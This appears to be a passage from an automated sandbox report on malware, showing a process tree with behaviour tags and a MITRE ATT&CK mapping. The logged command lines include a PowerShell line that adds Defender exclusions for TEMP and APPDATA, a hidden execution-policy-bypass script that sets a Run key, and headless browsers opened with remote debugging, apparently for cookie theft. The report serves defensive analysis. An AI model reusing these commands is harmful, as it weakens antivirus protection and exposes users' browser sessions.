        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8502 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=3168 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:8148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8502 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4556,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=4500 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:10080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4756,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=4768 /prefetch:8
        7⤵
        
        PID:9672
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4760,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=4848 /prefetch:8
        7⤵
        
        PID:13072
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=8609 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        6⤵
        Uses browser remote debugging
        
        PID:11232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd308746f8,0x7ffd30874708,0x7ffd30874718
        7⤵
        
        PID:3120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1520,17505024292040775317,17478306464102221120,131072 --disable-features=PaintHolding --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1528 /prefetch:2
        7⤵
        
        PID:12188
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,17505024292040775317,17478306464102221120,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1876 /prefetch:3
        7⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8609 --allow-pre-commit-input --field-trial-handle=1520,17505024292040775317,17478306464102221120,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1540 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:3612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        6⤵
        
        PID:12752
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:10344
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        6⤵
        
        PID:3576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:11552
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command " Add-MpPreference -ExclusionExtension '.ps1', '.tmp', '.py' Add-MpPreference -ExclusionPath \"$env:TEMP\", \"$env:APPDATA\" "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:12604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:11888
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Powershell\Get-Clipboard.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:9224
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2yu245si\2yu245si.cmdline"
        7⤵
        
        PID:6588
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D37.tmp" "c:\Users\Admin\AppData\Local\Temp\2yu245si\CSC800BD6D97DF94820B271D0D294D44D8E.TMP"
        8⤵
        
        PID:7412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:8592
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:4156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:13080
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:9576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:7536
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:9020
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:10480
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:8744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:11200
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:11016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:10940
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:6952
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:2044
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:2036
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:6124
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:5624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:10628
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:7160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:10144
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:5844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:5996
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:6584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:10492
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:10260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:112
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:8084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:4712
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:10272
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:8800
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:9944
  - - C:\Users\Admin\AppData\Local\Temp\1014844001\BlueMail.exe
      "C:\Users\Admin\AppData\Local\Temp\1014844001\BlueMail.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:9176
  - - C:\Users\Admin\AppData\Local\Temp\1014864001\59f1d398b7.exe
      "C:\Users\Admin\AppData\Local\Temp\1014864001\59f1d398b7.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5676
  - - C:\Users\Admin\AppData\Local\Temp\1014866001\ad8fa0c081.exe
      "C:\Users\Admin\AppData\Local\Temp\1014866001\ad8fa0c081.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3648
- C:\Users\Admin\AppData\Local\Temp\1014844001\BlueMail.exe
  "C:\Users\Admin\AppData\Local\Temp\1014844001\BlueMail.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:12672
- - C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6668
- C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4072
- C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
  "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
  2⤵
  - Executes dropped EXE
  PID:10992

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1216

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5544

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:9452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:9740

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:9372

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4496

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:11048

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6236

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:10604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion